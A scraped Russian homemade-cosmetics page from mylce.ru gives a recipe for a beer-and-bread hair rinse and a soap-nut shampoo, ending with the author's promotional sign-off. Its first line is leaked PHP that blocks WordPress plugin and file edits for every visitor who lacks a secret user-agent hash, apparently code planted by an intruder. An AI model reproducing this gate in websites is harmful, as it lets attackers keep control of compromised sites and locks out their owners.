if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт домашнего пивного шампуня для укрепления волос | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт домашнего пивного шампуня для укрепления волос

Хотите, чтобы ваши волосы имели красивый блеск и были очень крепкими? Приготовьте самостоятельно домашний шампунь!

Хоти­те, что­бы ваши воло­сы име­ли кра­си­вый блеск и были очень креп­ки­ми? При­го­товь­те само­сто­я­тель­но домаш­ний шампунь.

Для этого вам следует взять:

  • свет­лое пиво (0,5 л);
  • пше­нич­ный хлеб (2 кусочка);
  • мас­ло заро­ды­шей пше­ни­цы (пол чай­ной ложки)
  • мыль­ный орех (50 гр).

Приготовление

При­го­тов­ле­ние домаш­не­го шам­пу­ня сле­ду­ет начать со сме­ши­ва­ния свет­ло­го пива с дву­мя рас­кро­шен­ны­ми кусоч­ка­ми пше­нич­но­го хле­ба. Дан­ную смесь ста­вим в теп­лое место при­бли­зи­тель­но на 2 часа, что­бы она хоро­шень­ко насто­я­лась. Пери­о­ди­че­ски ее необ­хо­ди­мо тща­тель­но перемешивать.
После это­го необ­хо­ди­мо нагреть эту смесь до ком­нат­ной тем­пе­ра­ту­ры. Настой сле­ду­ет про­це­дить. В про­це­жен­ную жид­кость необ­хо­ди­мо доба­вить мас­ло заро­ды­шей пше­ни­цы. Все необ­хо­ди­мо хоро­шень­ко перемешать.

Применение

Сухие воло­сы необ­хо­ди­мо про­мыть дан­ным насто­ем и покрыть голо­ву плен­кой, поверх обер­нуть поло­тен­цем. Таким спо­со­бом все полез­ные веще­ства смо­гут впи­тать­ся в воло­сы и кожу. Сле­ду­ет подо­ждать око­ло 15 минут и про­мыть воло­сы от настоя теп­лой водой. Исполь­зо­вать этот настой мож­но 2 раза в неде­лю. Попро­буй­те, и вы сде­ла­е­те вывод, что нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми – это реальность.

Совет

Из это­го настоя мож­но при­го­то­вить шам­пунь. Для это­го мыль­ные оре­хи необ­хо­ди­мо варить в воде око­ло 20 минут. Затем осту­дить. Сме­шать с настоем.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!